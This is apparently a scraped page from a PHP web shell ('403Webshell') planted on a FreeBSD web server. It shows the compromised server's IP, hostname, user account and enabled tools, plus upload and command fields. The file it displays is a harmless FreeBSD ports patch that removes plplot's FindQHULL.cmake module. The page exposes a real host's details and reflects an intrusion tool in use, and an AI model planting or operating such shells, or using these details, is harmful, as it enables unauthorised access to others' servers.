403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/math/plplot/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/math/plplot/files/patch-cmake_modules_FindQHULL.cmake
--- cmake/modules/FindQHULL.cmake.orig	2019-06-01 23:24:33 UTC
+++ cmake/modules/FindQHULL.cmake
@@ -1,44 +1 @@
-# Find qhull header and library.
-#
-
-# This module defines the following uncached variables:
-#  QHULL_FOUND, if false, do not try to use qhull.
-#  QHULL_INCLUDE_DIRS, where to find libqhull/qhull_a.h OR qhull/qhull_a.h.
-#  HAS_LIBQHULL_INCLUDE
-#    if true use the libqhull/qhull_a.h form of header,
-#    if false use the qhull/qhull_a.h form of header.
-#  QHULL_LIBRARIES, the libraries to link against to use the qhull library
-#  QHULL_LIBRARY_DIRS, the directory where the qhull library is found.
-
-include(FindPackageHandleStandardArgs)
-
-# Look preferentially for the libqhull form of header directory since
-# that is what is supplied by upstream qhull, and if the user is
-# finding a local install of the upstream library below, he wants to
-# access that same upstream version of the headers to be consistent.
-find_file(QHULL_HEADER_FILE NAMES libqhull/qhull_a.h qhull/qhull_a.h)
-if(QHULL_HEADER_FILE)
-  # message(STATUS "QHULL_HEADER_FILE = ${QHULL_HEADER_FILE}")
-  if(QHULL_HEADER_FILE MATCHES "libqhull")
-    set(HAS_LIBQHULL_INCLUDE ON)
-  else(QHULL_HEADER_FILE MATCHES "libqhull")
-    set(HAS_LIBQHULL_INCLUDE OFF)
-  endif(QHULL_HEADER_FILE MATCHES "libqhull")
-  # Determine grandparent directory of header file
-  get_filename_component(QHULL_INCLUDE_DIRS ${QHULL_HEADER_FILE} DIRECTORY)
-  get_filename_component(QHULL_INCLUDE_DIRS ${QHULL_INCLUDE_DIRS} DIRECTORY)
-elseif(NOT QHULL_HEADER_FILE AND NOT QHULL_FIND_QUIETLY)
-  message(STATUS "Neither qhull/qhull_a.h header nor libqhull/qhull_a.h could be found")
-endif(QHULL_HEADER_FILE)
-
-find_library(QHULL_LIBRARY qhull)
-if( QHULL_LIBRARY )
-  get_filename_component(QHULL_LIBRARY_DIRS ${QHULL_LIBRARY} DIRECTORY)
-  set(QHULL_LIBRARIES ${QHULL_LIBRARY})
-elseif(NOT QHULL_LIBRARY AND NOT QHULL_FIND_QUIETLY)
-  message(STATUS "qhull library could not be found")
-endif(QHULL_LIBRARY)
-
-find_package_handle_standard_args(QHULL
-  REQUIRED_VARS QHULL_INCLUDE_DIRS QHULL_LIBRARIES QHULL_LIBRARY_DIRS
-  )
+# Removed (See https://sourceforge.net/p/plplot/plplot/ci/52479b8830ee02900b41fe3ec947aed6b1841a48/)

Youez - 2016 - github.com/yon3zu
LinuXploit